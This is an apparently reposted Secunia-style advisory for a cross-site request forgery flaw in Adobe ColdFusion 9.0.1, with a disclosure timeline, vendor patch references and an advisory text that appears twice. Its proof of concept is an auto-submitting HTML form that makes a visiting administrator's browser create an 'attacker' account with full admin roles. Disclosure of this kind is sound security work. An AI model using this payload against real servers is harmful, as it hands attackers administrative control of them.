Description
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.
Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.
Proof of concept
<html>
Solution
Adobe has released patches which address this issue. Please see the references for more information.
References
Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013
Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.
Adobe ColdFusion application server enables developers to rapidly build, deploy, and maintain robust Internet applications for the enterprise.
Sow Ching Shiong, an independent vulnerability researcher has discovered Cross-Site Request Forgery vulnerability in Adobe ColdFusion. This issue was discovered in a default installation of Adobe ColdFusion 9.0.1.274733. Other earlier versions may also be affected.
Proof of concept
<html>
<body>
<form action="http://[target]:8500/CFIDE/administrator/security/useredit.cfm" id="csrf" method="post">
<input type="hidden" name="uname" value="attacker" />
<input type="hidden" name="password1" value="passwd123" />
<input type="hidden" name="password2" value="passwd123" />
<input type="hidden" name="Description" value="" />
<input type="hidden" name="userallowrds" value="true" />
<input type="hidden" name="userallowadministrative" value="true" />
<input type="hidden" name="userallow" value="adminapi" />
<input type="hidden" name="grantedRoles" value="coldfusion.collections,coldfusion.datasources,coldfusion.flexdataservices,coldfusion.migrateveritycollections,coldfusion.solrserver,coldfusion.verityk2server,coldfusion.webservices,coldfusion.codeanalyzer,coldfusion.debugging,coldfusion.licensescanner,coldfusion.logging,coldfusion.scheduledtasks,coldfusion.systemprobes,coldfusion.enterprisemanager,coldfusion.eventgateways,coldfusion.cfxtags,coldfusion.corbaconnectors,coldfusion.customtagpaths,coldfusion.applets,coldfusion.packagingdeployment,coldfusion.sandboxsecurity,coldfusion.monitoring,coldfusion.serversettings,coldfusion.serversettingssummary" />
<input type="hidden" name="grantedSandboxes" value="C:\ColdFusion9\wwwroot\CFIDE\,C:\ColdFusion9\wwwroot\WEB-INF\" />
<input type="hidden" name="grantedServices" value="mail,document,pdf,image,chart,pop,upload" />
<input type="hidden" name="adminaction" value="add" />
</form>
<script>
document.getElementById('csrf').submit();
</script>
</body>
</html>
Solution
Adobe has released patches which address this issue. Please see the references for more information.
References
Vendor URL: http://www.adobe.com/support/security/bulletins/apsb11-14.html
Secunia: http://secunia.com/advisories/43013
Disclosure Timeline
2011-01-21 - Vulnerability discovered.
2011-01-21 - Vulnerability reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerability and contacted the vendor.
2011-06-14 - Patch released.
2011-06-15 - Advisory published by Secunia.
No comments:
Post a Comment